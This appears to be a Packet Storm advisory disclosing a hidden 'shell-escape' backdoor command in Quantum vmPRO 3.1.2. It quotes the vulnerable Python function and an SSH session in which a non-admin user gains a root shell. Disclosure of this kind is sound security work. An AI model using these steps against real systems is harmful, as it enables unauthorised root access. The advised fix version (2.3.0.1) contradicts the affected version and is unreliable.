Exploit the possiblities

Quantum vmPRO 3.1.2 Root Shell

Quantum vmPRO 3.1.2 Root Shell
Posted Mar 18, 2014
Authored by xistence

Quantum vmPRO versions 3.1.2 and below suffer from a remote shell backdoor command that lets anyone ssh in and escalate to root.

tags | exploit, remote, shell, root
MD5 | 71977649a44253f552fee0162b363b00

Quantum vmPRO 3.1.2 Root Shell

Change Mirror Download
-----------
Author:
-----------

xistence < xistence[at]0x90[.]nl >

-------------------------
Affected products:
-------------------------

Quantum vmPRO 3.1.2 and below

-------------------------
Affected vendors:
-------------------------

Quantum
http://quantum.com/

-------------------------
Product description:
-------------------------

Unlike traditional backup applications and other backup applications
designed for virtual environments,
Quantum vmPRO Software backs up VMs in native VMware format. This enables
users to restore or boot VMs
in seconds without the use of a backup application, reduces virtual server
and network usage by reducing
VM image sizes before backing up those images to backup storage, and
substantially reduces the cost of
using traditional backup applications to back up virtual environments.

----------
Details:
----------

[ 0x01 - Shell Backdoor Command ]

The file "/usr/local/pancetera/bin/cmd_processor.py" on the vmPRO 3.1.2
virtual machine contains the following lines:

def cmd_shell_escape(self, args):
log_panshell(syslog.LOG_INFO, "internal consistency check started")
env = dict(os.environ)
env['SHELL'] = '/bin/bash'
env['HOME'] = '/tmp'
env['TERM'] = 'xterm'
os.spawnle(os.P_WAIT, '/bin/bash', 'bash', env)
log_panshell(syslog.LOG_INFO, "internal consistency check finished")
return

This is a hidden command to gain a root shell. If we create a user in the
web interface without administrator rights,
we can still ssh and gain a root shell! This of course should not be
possible and only be accessible to an admin user.

$ ssh non-admin@192.168.2.112
non-admin@192.168.2.112's password:
Last login: Thu Dec 19 23:42:10 2013 from 192.168.2.72
Welcome to Quantum vmPRO Console
--------------------------------

Quantum vmPRO GUI: https://192.168.2.112/

*** Type 'help' for a list of commands.

quantum:localhost> shell-escape
bash-4.1# id
uid=0(root) gid=100(users) groups=0(root),100(users)


-----------
Solution:
-----------

Upgrade to version 2.3.0.1 or newer

--------------
Timeline:
--------------

03-01-2014 - Issues discovered and vendor notified
15-01-2014 - No reply, asked for status update.
17-03-2014 - No replies, public disclosure

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    22 Files
  • 2
    Nov 2nd
    28 Files
  • 3
    Nov 3rd
    10 Files
  • 4
    Nov 4th
    1 Files
  • 5
    Nov 5th
    5 Files
  • 6
    Nov 6th
    15 Files
  • 7
    Nov 7th
    15 Files
  • 8
    Nov 8th
    13 Files
  • 9
    Nov 9th
    9 Files
  • 10
    Nov 10th
    9 Files
  • 11
    Nov 11th
    3 Files
  • 12
    Nov 12th
    2 Files
  • 13
    Nov 13th
    15 Files
  • 14
    Nov 14th
    17 Files
  • 15
    Nov 15th
    19 Files
  • 16
    Nov 16th
    15 Files
  • 17
    Nov 17th
    19 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close